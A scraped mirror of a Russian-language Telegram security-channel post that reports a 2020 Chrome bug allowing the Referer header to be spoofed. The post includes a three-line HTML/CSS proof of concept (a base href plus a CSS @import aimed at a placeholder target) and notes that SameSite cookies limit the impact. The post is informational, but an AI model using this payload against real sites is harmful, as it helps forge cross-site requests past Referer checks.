Notice: file_put_contents(): Write of 15426 bytes failed with errno=28 No space left on device in /var/www/tgoop/post.php on line 50
Кавычка@webpwn P.286
WEBPWN Telegram 286
tgoop.com » United States » Кавычка » Telegram web » Post 286
Кавычка
2020 потрясающий год. Помимо всего прочего, в Chrome можно подделать заголовок Referer, чего не было более десяти лет (раньше с помощью Flash можно было подменить этот заголовок).
PoC был выложен несколько дней назад и совершенно тривиальный:

<base href="https://www.google.com/">
<style>
@import 'https://CSRF.vulnerable.example/';
</style>

Запрос к сайту уйдет с заголовком
Referer: https://www.google.com/

К счастью, половину интернета этим не заломаешь (SameSite cookie, вот это все), но имейте в виду.
www.tgoop.com/webpwn/286
20.4K viewsBo0oM, edited  



tgoop.com/webpwn/286
Create:
Last Update:

2020 потрясающий год. Помимо всего прочего, в Chrome можно подделать заголовок Referer, чего не было более десяти лет (раньше с помощью Flash можно было подменить этот заголовок).
PoC был выложен несколько дней назад и совершенно тривиальный:

<base href="https://www.google.com/">
<style>
@import 'https://CSRF.vulnerable.example/';
</style>

Запрос к сайту уйдет с заголовком
Referer: https://www.google.com/

К счастью, половину интернета этим не заломаешь (SameSite cookie, вот это все), но имейте в виду.

BY Кавычка


Share with your friend now:
tgoop.com/webpwn/286

View MORE
Open in Telegram


Telegram News

Date: |

Image: Telegram. 5Telegram Channel avatar size/dimensions The main design elements of your Telegram channel include a name, bio (brief description), and avatar. Your bio should be: Concise How to Create a Private or Public Channel on Telegram?
from us


2020 потрясающий год. Помимо всего прочего

 Кавычка TG
web: 286
Кавычка.Telegram web
Кавычка Telegram TG Channel
Telegram Updated:
Telegram Кавычка
FROM American